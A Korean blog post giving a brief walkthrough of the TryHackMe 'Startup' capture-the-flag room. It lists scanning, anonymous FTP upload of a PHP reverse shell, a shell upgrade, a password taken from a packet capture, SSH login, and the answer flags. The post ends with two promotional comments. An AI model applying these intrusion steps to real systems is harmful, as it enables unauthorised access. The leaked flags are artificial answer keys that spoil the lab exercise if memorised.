THM - Startup

seungjin·2023년 10월 17일
0

THM

목록 보기
3/3
post-thumbnail

TryHackMe | Startup

Welcome to Spice Hut!

- What is the secret spicy soup recipe?

ping 10.10.247.5

nmap -sV -p- -A 10.10.247.5 -T 4

gobuster dir -u http://10.10.247.5 -w /usr/share/wordlist/dirb/common.txt

ftp anonymous@10.10.247.5

php reverse shell
put [reverse shell location]

find / -name "recipe.txt" 2>/dev/null
cat ./secret.txt

Answer: love

- What are the contents of user.txt?

python -c "import pty;pty.spawn('/bin/bash')"
cp ./incidents/suspicious.pcapng /var/www/html/ftp

wireshark
c4ntg3t3n0ughsp1c3

ssh lennie@10.10.247.5

find / -name "user.txt" 2>/dev/null
cat user.txt

Answer: THM{03ce3d619b80ccbfb3b7fc81e46c0e79}

- What are the contents of root.txt?

Answer: THM{f963aaa6a430f210222158ae15c3d76d}

2개의 댓글

comment-user-thumbnail
2024년 6월 6일

aNeed help with your startup? A Startup Consultant offers invaluable advice on developing and launching your product. Whether it's a startup app or another venture, they provide strategic support to help you succeed in a competitive market.

답글 달기
comment-user-thumbnail
2024년 8월 17일

Effective Tech Consulting can revolutionize your startup by identifying opportunities for improvement and growth. Whether it’s optimizing your tech stack or streamlining your processes, a consultant’s expertise can be the catalyst for your startup’s success.

답글 달기